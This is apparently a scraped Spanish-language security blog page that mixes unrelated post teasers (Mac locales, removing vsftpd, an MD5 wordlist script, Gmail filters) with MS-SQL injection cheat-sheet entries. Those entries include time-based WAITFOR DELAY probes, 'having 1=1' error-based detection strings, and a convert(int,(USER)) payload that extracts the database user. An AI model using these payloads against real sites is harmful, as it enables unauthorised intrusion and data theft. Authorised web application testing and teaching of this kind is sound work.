Blind SQL Injection

BLIND SQLInjection

BLIND SQL INJECTION - DETECTION
	Integer Injection: http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)  String Injection: http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)

Fix Locales en Mac OS X

En Mac OS X en alguna ocasión podemos encontrarnos con problemas de locales cuando utilizamos conexiones ssh.

Desinstalar Vsftpd de Kali Linux

Desinstalar vsftpd de kali linux o cualquier distro basada en debian muchas veces puede traer problemas a la hora de actualizar o instalar nuevos paquetes.

Script en Python para generar hashes MD5 [MD5FILEGEN V1.0]

En este post les traigo un script en python para generar un archivo de hashes en MD5 a partir de otro archivo con palabras.

Organiza tu inbox y filtra tus correos por años en Gmail

Cuando ya tenemos mucho tiempo con nuestra cuenta de correo de Gmail, aveces llegamos a un punto en el que es necesario organizar el inbox y que mejor momento para hacerlo que a principios de año.

DETECCION BASICA DE INYECCION DE CODIGO EN MS-SQL

 MS-SQL INJECTION Basic DETECTION

DETECCION BASICA DE INYECCION DE CODIGO EN MS-SQL



     

Integer Injection:

http://[site]/page.asp?id=1 having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.



String Injection:

http://[site]/page.asp?id=x' having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.




ERROR SQL INJECTION - EXTRACT DATABASE USER

       

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Web Application Testing = Pruebas a Aplicaciones web.

=======================

Web Application Testing ( Pruebas a Aplicaciones WEB)

=======================

Comandos para la verificación de SQLi en servidores web

http://ip_del_servidor/

http://ip_del_servidor/abcd.aspx?id=2

http://ip_del_servidor/abcd.aspx?id=2'

http://ip_del_servidor/abcd.aspx?id='